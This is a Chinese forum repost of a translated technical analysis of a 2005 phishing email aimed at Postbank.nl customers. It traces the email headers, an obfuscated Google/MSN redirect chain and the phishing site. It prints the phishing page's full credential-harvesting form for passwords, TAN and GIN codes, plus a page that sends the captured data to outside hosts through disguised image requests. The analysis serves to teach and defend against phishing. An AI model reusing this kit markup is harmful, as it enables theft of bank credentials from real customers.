黑色海岸线论坛 - Powered by Discuz! Board

标题: [转载] 分析Postbank_nl网络钓鱼的阴险伎俩 [打印本页]

作者: stylehack 时间: 2007-5-31 21:58 标题: 分析Postbank_nl网络钓鱼的阴险伎俩

简单介绍：
我每天都会接到很多的企图进行网络钓鱼的电子邮件，绝大部分都被我一眼认出来是广告后直接塞到了垃圾邮件文件夹里了。而一些不大好辨认的，我都通过手工检测后也搞掂了。今天在翻阅垃圾邮件文件夹欣赏我的成果时，发现了一个企图诱骗用户提交Postbank.nl信用信息的骗局。我一下就被他的阴险技巧吸引了，事实上这也是我第一次看见伪装成Postbank的网络钓鱼。Postbank是荷兰最大的银行之一，也是那儿安全性最差劲的银行之一。其他的银行已经开始采用数字凭证（有的时候叫随机读卡）了，而Postbank仍然在使用的是用户名/密码加TAN码的方式来登录。当Postbank的客户们需要做交易或者是查询的时候仅仅需要输入用户名密码和一个TAN码就可以了，而每当客户的TAN码用完后他(她)就会收到一批新的。Postbank的另外一种电脑化银行业务的方式是使用Girotel Onlin，顾客如果想要访问自己的帐号必须输入他们的Girotelnumber和Codenumber以及GIN码。

本文仅仅是从技术的角度去分析这个案例。虽然我的分析可能会给网络钓鱼的实施者们一些启发，但是本质的出发点是为了让大家了解这种伎俩。就在我开始写这篇分析后的数小时后，这个案例也受到了荷兰各媒体的广泛关注。在荷兰G0vernment的计算机应急响应小组收到关于此案件的警报后，一些大型的新闻站点和无线广播相继开始报道。据说当前已经出现了几个针对不同站点的变种。不过我能只对我自己收到的这份进行分析。

我收到的e-mail：
好了，我们从我收到的这封e-mail开始吧。我给出完整的版本，唯一的区别就是我去掉了一些空行并转换为纯文本格式，另外对一些敏感信息做了屏蔽。
Copy code

Return-Path: <BenedettaBruno@postbank.nl>
Received: from vas02.wanadoo.nl (vas02.wanadoo.nl [194.134.35.217])
by pop1.euronet.nl (Postfix) with ESMTP id 46E662ACBCA
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
by vas02.wanadoo.nl (Postfix) with ESMTP id 37CB92A9561
for <p54227100@pop1.euronet.nl>; Sat, 4 Jun 2005 04:04:07 +0200 (CEST)
Received: from vas02.wanadoo.nl ([127.0.0.1])
by localhost (vas02.wanadoo.nl [127.0.0.1]) (amavisd-new-wb5, port 10024)
with ESMTP id 12540-53 for <p54227100@pop1.euronet.nl>;
Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from mx1.euronet.nl (mx1.euronet.nl [194.134.35.134])
by vas02.wanadoo.nl (Postfix) with ESMTP id 7BCB92A9555
for <************@euronet.nl>; Sat, 4 Jun 2005 04:04:05 +0200 (CEST)
Received: from 132-8.200-68.tampabay.res.rr.com (132-8.200-68.tampabay.res.rr.com [68.200.8.132])
by mx1.euronet.nl (Postfix) with SMTP id 9359C58320
for <************@euronet.nl>; Sat, 4 Jun 2005 03:56:41 +0200 (MEST)
Message-ID: <173a01c5649e$054029eb$d36eefa1@postbank.nl>
From: Postbank.nl <BenedettaBruno@postbank.nl>
T ************@euronet.nl
Subject: ***SPAM*** =?iso-8859-1?B?UG9zdGJhbmsgRW1haWwgVmVyaWZpY2F0aW9uIC0gc2NoZXJwZW5zZWVsQGV1cm9u?=
=?iso-8859-1?B?ZXQubmw=?=
Date: Sun, 29 May 2005 22:32:26 +0000
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="----=_NextPart_000_0000_42715370.3CB1ABCF"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express V6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-Virus-Scanned: Wanadoo VAS
X-Spam-Status: Yes, hits=6.5 tagged_above=4.9 required=4.9 tests=BAYES_44,
CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,
HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS
X-Spam-Level: *******
X-Spam-Flag: YES
X-UIDL: 18d4c6eb5308141f578487627c916740
Status: R
X-Status: NC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:

This is a multi-part message in MIME format.

------=_NextPart_000_0000_42715370.3CB1ABCF
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0001_EF4ABF4E.C7EC9C49"

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Dear Postbank Customer,

This email was sent by the Postbank server to verify your e-mail address. You must complete this process by
clicking on the link below and entering in the small window your Postbank online access details. This is done for
your protection - because some of our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address, click on the link below:

<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>

------=_NextPart_001_0001_EF4ABF4E.C7EC9C49--

------=_NextPart_000_0000_42715370.3CB1ABCF--

你可以看见，这个垃圾邮件已经被我ISP(Wanadoo.nl邮件服务器)的SpamAssassin软件标识成了广告，原因是：
Quote:

BAYES_44, CLICK_BELOW, DATE_IN_PAST_96_XX, FORGED_OUTLOOK_TAGS, HTML_MESSAGE,HTTP_EXCESSIVE_ESCAPES, RCVD_IN_LSORBS

如果转换成自然语言的可读格式意思就是：
此封e-mail被确认成广告的可能性在44-50%，软件作者提醒用户点击下面的链接，此e-mail是在96个小时以前更新的，这封e-mail包含伪造的Outlook标签，这封e-mail使用HTML格式而并非纯文本，邮件体内包含很多没必要的链接并且发送者处于SORBS(Spam and Open Relay Blocking System)的黑名单里。

这个e-mail是从132-8.200-68.tampabay.res.rr.com发送过来的，解析地址是68.200.8.132。主机名中的tampabay可能暗示着这个服务器应该是在美国佛罗里达州的Tampa Bay。在本文撰写的过程中这个主机无法ping通，而通过对全部端口的扫描我们得知其开了一些常见的端口25/smtp、80/http、1080/socks、3128/squid-http和8080/http-proxy。rr.com 的所有者是全美最大的电缆宽带ISP之一的Road Runner。Road Runner目前仍然提供拨号网络服务，不过大部分已经提供托管业务了。我现在最好的估计就是这信息是通过其中的一台服务器发送的，也许因为这个目前或者曾经是军方配置的代理，提供了smtp转发，或者一个木马机器人网络的受害者，或者提供了wifi访问。不过现在我们已经可以把发送者的物理地址锁定在美国佛罗里达州的Tampa Bay。

下面我们在body之前先注意一下e-mail的发送者是Postbank.nl <BenedettaBruno@postbank.nl>，BenedettaBruno看起来像一个意大利人的名字。这批网络钓鱼的e-mail都是以意大利名字发送的。

OK，现在我们来看body部分。当看见这e-mail的第一反映就是它没有按照正确的HTML格式。我使用的Linux下的Kmail客户端没有认出这信息是HTML格式，因此没有允许我直接查看。原因很可能是body部分被压缩到了几个MIME头里，它是一个畸形的多段信息。

信中要求Postbank客户(或者说所有的阅读者，比如我并不是Postbank的客户)点击一个链接并提交他们的Postbank信用帐户登录信息，以此来校检他们的e-mail地址。如果这些网络钓鱼诡计的实施者们使用荷兰语来写这封e-mail，那么诈骗的成功率将更加高，所以我基本推断可以排除骗子是荷兰语系的本地人。好，下面让我们看看他们提供的链界：
Copy code

<a href="http://www.google.es/url?q=http://go.msn.com/HML/1/5.asp?target=http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/" target=_blank>http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3</a>

如果受害者e-mail客户端的HTML代码显示正常，将只能看见
Copy code

http://www.postbank.nl/gRK6QnraG6FTLfFmTNNbX68U7rj8Q22oyqyIKv8qBXCeGv0TJYa0w9g6c6wih2g3

这一部分，而事实上在Postbank站点URL的后面是一个与我们所看见的部分毫不相关的地址，而我估计这仅仅是让地址看起来比较可信。总之，最后一个部分的链界是并非有害的部分，它其实只是一个有害链接的幌子。正如我们所看见的那样，发送者采取了两个转向。首先受害者被引向了Spanish Google，而这个链接引导受害者继续转到了MSN，最终指到了http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/，而Google和MSN的前缀只是为了迷惑受害者，让他们以为他们到达的是一个合法的地址。受害者很轻易就能认出Google和MSN，并且就不会把过多的注意力放在URL最后的陌生代码上了。

Time to decode the final link destination. I coded together a very simple perl script based on Glenn Fleishman's code which I used to decode the URL.
揭露链接的最后地址的时间到了。

我使用邪恶八进制信息安全团队冰狐浪子的专用线上解码工具进行解码后情况如下：
Copy code

http://%68k%73chf%09%6f%2E%64%%09a%2ER%%09U/

Decode后得出了
Copy code

http://hkschf o.d% a.R% U/

URL地址：
Removing the whitespace and the excessive %-signs we get: http://hkschfo.da.RU/. Da.ru is a Russian free URL service where you can freely register a http://yourname.da.ru URL. Next thing to do is requesting the HTTP headers from hkschfo.da.ru:
把地址中的空格和多余的%标志去掉后得到地址http://hkschfo.da.RU/。这个地址是俄罗斯免费URL服务，你可以免费注册一个http://yourname.da.ru的URL。
然后是取得hkschfo.da.ru的HTTP头，也就是咱们说的Banner。

Quote:

[vincent@matrix sandbox]$ telnet hkschfo.da.ru 80
Trying 195.161.113.135...
Connected to hkschfo.da.ru (195.161.113.135).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:hkschfo.da.ru

HTTP/1.1 302 Found
Date: Sat, 04 Jun 2005 18:11:14 GMT
Server: Apache/1.3.9 (Unix) da.ru/1.2/DeathMatch
Location: http://dlkrexae.nm.ru/
Connection: close
Content-Type: text/html

As you can see the visitor is directly redirected via a 302 to dlkrexae.nm.ru. Nm.ru is also a free URL service but unfortunately I don't speak Russian so I can't exactly find out more about it. This is the third redirection! Let's examine the HTTP headers of dslkrexae.nm.ru:
看到了没？访问者被直接重定向到了dlkrexae.nm.ru。Nm.ru也是一个免费URL服务，但是很不幸我不会俄语，就不能搞的更清楚。这是第三个转向地址，让我们来看看dslkrexae.nm.ru的HTTP头。

Quote:

[vincent@matrix sandbox]$ telnet dlkrexae.nm.ru 80
Trying 212.48.140.151...
Connected to dlkrexae.nm.ru (212.48.140.151).
Escape character is '^]'.
HEAD / HTTP/1.0
Host:dlkrexae.nm.ru

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2005 17:38:11 GMT
Server: Apache/1.3.27 (Unix)
Last-Modified: Sat, 04 Jun 2005 11:44:45 GMT
ETag: "d283dc-1c8-42a1942d"
Accept-Ranges: bytes
Content-Length: 456
Connection: close
Content-Type: text/html; charset=windows-1251

最后，清楚了么？还不清楚？好，那咱们再看看源文件：

Copy code

<HTML><HEAD>
<META HTTP-EQUIV="Refresh" C>
<SCRIPT language=JavaScript>
// ensure top window
if (window != top)
{
top.location = window.location;
}
</SCRIPT>
<title></title></HEAD>
<BODY bgColor=#ffffff >
</BODY></HTML>
<textarea style=display:none>

看！这就是诡计：用JavaScript弹出窗口把访问者重定向到第五个地址，也是最终目的地——Postbank的页面(www.postbank.nl)。而这个页面是在弹出窗口http://dlkrexae.nm.ru/welcome3.html中加载的。

Copy code

<html lang="en">

<head>

<title>E-mail Verification - Postbank.nl</title>

<link rel="stylesheet" type="text/css" href='https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008'>

</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<center>
<br>
<table width="430" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="150" valign="top"></td>
<td width="10"> </td>
<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="left"><center><img src=sim.gif></center></td>
</tr>
</table>
<hr size="1">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>

<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">
<br>
<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Mijn Postbank.nl Clients:</font></center></td>
</tr>

<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> UserID (Gebruikersnaam): </font></td>
<td align="left" valign="bottom"><input type="text" name="bankn" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>
<tr>
<td width="65%" align="left" valign="middle"><font size=3 color=black> Password (Wachtwoord): </font></td>
<td align="left" valign="bottom"><input type="password" name="word" size="17" maxlength="30" class="inputtext" AUTOCOMPLETE="OFF" value=""></td>
</tr>
<tr><td height="12"> </td></tr>

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For ALL Clients - enter your next three TAN codes:</font></center></td>
</tr>

<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td><td align="center"> </td><td align="center"><font size=2>volg N</font></td><td align="center"><font size=2>TAN</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="vol1" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF"
value=""></td><td align="center"><input type="text" name="pass1" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol2" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass2" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="text" name="vol3" size="4" maxlength="4" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"><input type="text" name="pass3" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""><input type="hidden" name="ve" value="se"></td>
</td>
</tr></table>
</center>

</td>
</tr>

<tr><td height="12"> </td></tr>

<tr>
<td width="65%" align="left" valign="middle" colspan=2><center><font size=3 color=black>For Girotel Online Clients:</font></center></td>
</tr>
<tr>
<td align="left" valign="bottom" colspan=2>
<center>
<table>
<tr>
<td align="center"><font size=2>Girotelnummer</font></td><td align="center"> </td><td align="center"><font size=2>Codenummer</font></td><td align="center"> </td><td align="center"><font size=2>GIN-code</font></td>
</td>
</tr>
<tr>
<td align="center"><input type="text" name="girn" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="conum" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td><td align="center"> </td><td align="center"><input type="password" name="gcod" size="6" maxlength="6" class="inputtext" AUTOCOMPLETE="OFF" value=""></td></td>
</td>
</tr></table>
</center>

</td>
</tr>

<tr><td height="12"> </td></tr>

<tr>
<td width="57%"> </td>
<td align="right" class="body">
<input type="button" name="loginButton" value=" Verify " onclick=javascript:aceptar()>
</td>
</tr>
</table>
</form>

</td>
</tr>
</table>
</td>
<td width="10"> </td>
</tr>
</table>

</center>
</body>
<script>
function Submitir() {
document.formulario.submit();
}
function aceptar() {

if (document.formulario.vol1.value != '')
{
if (document.formulario.pass1.value != '')
{
if (document.formulario.vol2.value != '')
{
if (document.formulario.pass2.value != '')
{
if (document.formulario.vol3.value != '')
{
if (document.formulario.pass3.value != '')
{

Submitir();
}

else
{ alert("You need to enter your third VALID NEXT TAN code!");
document.formulario.pass3.focus();
}
}

else
{
alert("You need to enter Volgnummer of your third VALID NEXT TAN code!");
document.formulario.vol3.focus();
}
}

else
{
alert("You need to enter your second VALID NEXT TAN code!");
document.formulario.pass2.focus();
}
}

else
{
alert("You need to enter Volgnummer of your second VALID NEXT TAN code!");
document.formulario.vol2.focus();
}
}

else
{
alert("You need to enter your first VALID NEXT TAN code!");
document.formulario.pass1.focus();
}
}

else
{
alert("You need to enter Volgnummer of your first VALID NEXT TAN code!");
document.formulario.vol1.focus();
}
}

</script>
</html>
<textarea style=display:none>

The fact that this was added hours after the first e-mails were sent means that the scammers are still actively working to perfect their scam.
这就是诱骗Postbank客户输入他或者她的用户名，密码和TAN码的地方。通过我的分析，我发现了页面里被加入了新段。这个诡计同时也可以用在Postbank Girotel Online客户服务上，骗取Girotelnumber、Codenumber和GIN码。使用这些骗取来的信用信息，骗子们足以能够访问Postbank客户的Girotel帐号。事实上这些是在首封邮件发送成功后被加上去的，也就意味着这些骗子们仍然在为完成骗局而活跃着。

让我门看看这个源代码，首先印入眼帘的就是包含了一个来自https地址的stylesheet：
Copy code

<link rel="stylesheet" type="text/css" href='https://ib.national.com.au/nabib/scripts/nabstyle.css?id=008'>

这是个反常的现象：stylesheet定义了很多classes但是welcome3.html却根本没有用。域名national.com.au是属于澳大利亚国立银行的，这是一个坐落于澳大利亚，新西兰和英国的商业银行。为什么骗子们要用这么拙劣的手段去伪造一个stylesheet标签呢？我想，估计是为了利用这银行的HTTPS弹出一个安全提示，用于迷惑受害者。一些受害者很容易被有安全提示的链接所迷惑，信任这样的链接是安全的。不过这种手段对Firefox是没有效果的，Firefox不会把它识别成安全页面。我也测试了最新版本的IE，其实最新的IE也可以把它的诡计识破。
我于是先把代码中的stylesheet标识去掉，因为我觉得他与咱们剩下要分析的关系不大。

Copy code

<form action="obr2.html" method="get" name=formulario>
<input type="hidden" name="go" value="hm">

这里经过HTTP GET请求把数据送到obr2.html后到底发生了什么了呢。当用户填写了数据后，有一个隐藏的name="go"同时带了value="hm"。这个值是静态的，当我重复请求页面它是不会发生变化的。明显这个是由骗子们建立用来标识和记录是否有人中计点了重定向的链接和受害者来自哪里的，由于发送邮件的量非常大面非常广。
我们还发现JavaScript函数使用的是西班牙语名字：function Submitir()，document.formulario.submit()和function aceptar()。这里我们可以估计，骗子们可能说西班牙语，当然，也有可能是从互联网拷贝下来的例子代码。

处理方法：
Time to fill out some paperwork. Surfing through an anonymous open proxy server I entered some bogus information in the text boxes while I had a packetsniffer running on my gateway. This is what came through:
该做一些实事了。通过使用一个公开的匿名代理服务器访问互联网，我在这个文本框中输入了一些伪造的信息，同时在我的网关上安装运行了一个包嗅探设备。这就是通过他的数据：

Copy code

GET http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=&
conum=&gcod= HTTP/1.1

果然不出我所料，我所填写的数据都通过了GET请求送到了obr2.html。下面就是obr2.html的源代码大致的样子：

Copy code

<html>
<head>
<title></title>
<META HTTP-EQUIV="Refresh" C>
</head>
<body>
<center><img width=1 height=1
src="http://z33455&
#046;infobox.ru/cg
i-bin/result/&
#105;mg10.cgi"><br><img width=1 height=1 src="http://z33431&
#046;infobox.ru/cg
i-bin/result/&
#105;mg10.cgi">
<br><br><br>
</b><br><br><b><br>
</center>
</body>
</html>
<textarea style=display:none>

页面obr2.html显示了两张图片，一秒后转向到了另外一个页面rezult.html。这两张图片的代码似乎是经过了HTML加密，译出后，图片的标识如下：

Copy code

<img width=1 height=1 src="http://z33455.infobox.ru/cgi-bin/result/img10.cgi"><br><img width=1 height=1 src="http://z33431.infobox.ru/cgi-bin/result/img10.cgi">

其实他们的伎俩很简单：HTML中加载了两个CGI脚本作为图片。这就是数据通过GET发给了骗子的原因，当提交的时候这两个CGI起了作用。在这个过程中，传递的就是我刚才提交的伪造的Postbank信用帐户信息，很不幸的是我没有办法得到这两个CGI脚本。至于文件中包含了两个CGI脚本很有可能是为了防止出错，这里有一份我的包嗅探器记录到的请求：

Copy code

GET http://z33431.infobox.ru/cgi-bin/result/img10.cgi HTTP/1.1
Host: z33431.infobox.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://dlkrexae.nm.ru/obr2.html?go=hm&bankn=jansen343&word=password007&vol1=23&pass1=452442&vol2=24&pass2=324233&vol3=25&pass3=234432&ve=se&girn=
&conum=&gcod=

另外一份除了主机名以外也应该是十分相似的(z33455.infobox.ru，而不是z33431.infobox.ru)，Infobox.ru是一个虚拟主机服务提供商，好象没有看见他提供免费的URL服务，不过提供了一个月的试用时间，而骗子们使用这个空间的可能性很大。

好了，做一个最后的总结。当页面转向完毕后，经过一秒钟才加载下一个重定向到rezult.html，这其实是在为那两张图片加载争取时间。下面就是rezult.html的原代码了：

Quote:

<html>
<head>
<title>Your E-Mail Was Verified.</title>
</head>
<body>
<center>
<font size=3 color=red>
<br><br><br><br><b>Thank you.
</font>
<font size=3>
</b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br>
</font>
</center>
</body>
</html>
<textarea style=display:none>

嘿嘿，到这里，分析就基本完成了。

最终结论：
在这次分析里我们看到了此次Postbank.nl网络钓鱼富有技术的一面。与抓到骗子相比，其实我更感兴趣的是这些骗子们是怎样完成这次骗局的，而且我也没那个资本去捉住这些制作骗局的人。由于他们用了大量的免费域名服务以及重定向，因此想跟踪到最终的确认地址是十分困难的。
(剩下的是tmd一大堆废话，好象自己很了不起的样子，fuck！不翻译了...)

7 June 2005补充：
非常高兴我能收到很多关于我的分析文章的积极反馈，并且感谢所有朋友的关注。尤其应该感谢Moritz Naumann和Frans E.提供的有关SORBS(Spam and Open Relay Blocking System)垃圾邮件名单的相关资料。当更新过这个文章后，我立刻联系到了存放CGI脚本的Infobox.ru，他们的工作人员立刻关闭了非法帐号。我们希望更多的公司能像Infobox.ru那样积极的参与和配合世界范围内的应急响应。如果发现了与此次网络钓鱼有关的更多信息，欢迎您通过文首的 e-mail联系我们。同时感谢PRC的邪恶八进制信息安全团队(www.eviloctal.com)将本文无偿翻译成中文，以便更多的人可以作为参考。

目前，Postbank也积极做了更进一步的安全防护以应对这种网络钓鱼的攻击方法：他们在自己的页面中加入了反弹出窗口的代码(http://www.postbank.nl/)，代码如下：
Copy code

<script language="javascript" type="text/javascript">
var phisher = window.open('', 'myqos9', 'height=1, width=1, left=0, top=0,resizable=no,scrollbars=no,toolbar=no,status=no');
if (phisher.location && !phisher.closed) {
phisher.close();
}
</script>

这段代码的作用是打开一个与前面我们介绍的网络钓鱼者设置的名字一样的新的弹出窗口，并且立刻关闭。这个效果是很明显的，但是如果骗子把名字从myqos9更换成其他的呢？不论如何，这是个相当不错的消息，但是更根本的方法应该是更换一种验证方式。

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)